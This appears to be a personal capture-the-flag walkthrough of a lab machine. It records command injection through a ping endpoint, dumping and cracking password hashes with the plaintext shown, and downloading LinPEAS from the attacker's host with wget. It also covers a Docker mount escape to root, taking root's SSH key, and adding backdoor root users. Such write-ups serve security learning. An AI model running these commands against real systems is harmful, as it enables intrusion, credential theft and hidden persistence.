Docker

what I did wrong. I did not look into JS and try to see what happens if we manually do what it’s doing

we should’ve went to the website and tried to see the API.

We can ping using the web page. Can we add commands after?

; ls -la

&& ls -la

back ticks take precedent over other commands:

10.10.69.183:8081/ping?ip=`ls -la`

we find a file:

utech.db.sqlite

Cat it out:

cat utech.db.sqlite

We get hash(es?):

(Mr00tf357a0c52799563c7c7b76c1e7543a32)Madmin0d0ea5111e3c1def594c1684e3b9be84

Possibly for users:

Mr00t
Madmin

Cracked:

f357a0c52799563c7c7b76c1e7543a32:n100906
0d0ea5111e3c1def594c1684e3b9be84:mrsheafy

try them:

r00t:n100906
admin:mrsheafy

ssh r00t@10.10.69.183
n100906

worked!

sudo -l
grep --color=auto -rnw '/' -ie "PASSWORD=" --color=always 2> /dev/null
find / -name authorized_keys 2> /dev/null
find / -name id_rsa 2> /dev/null
history
find / -perm -u=s -type f 2>/dev/null
find / -type f -perm -04000 -ls 2>/dev/null
dpkg -l | grep nginx
getcap -r / 2>/dev/null
env

nothing!

Automated script time.

host up LinPEAS:

python3 -m http.server 80

on victim:

wget http://10.6.62.12/linpeas.sh

give it execute perms:

chmod +x linpeas.sh

run it:

./linpeas.sh

It showed docker with red/yellow. How can we use it? Try GTFOBins?

docker run -v /:/mnt --rm -it bash chroot /mnt sh

we run whatever we want. This command runs alpine. We run bash.

we get a shell

whoami
#root
cd root
ls
cat private.txt

not the flag?

ls -la

there’s SSH folder

cd .ssh

we get the id_rsa

SSH Keys

copy the id_rsa and make it a file on Kali machine:

mousepad id_rsa

change perms to use it to connect:

chmod 600 id_rsa

connect with it:

ssh -i id_rsa root@10.10.69.183

ssh -l root 10.10.69.183 -i id_rsa -oHostKeyAlgorithms=+ssh-rsa -oPubkeyAcceptedKeyTypes=+ssh-rsa

neither working. Can we give ourselves a sudo user?

useradd bmw -m -G sudo --password 340i

didn’t work?

adduser -u 0 -g root -G root -s /bin/bash -r HackerS2H -p 123456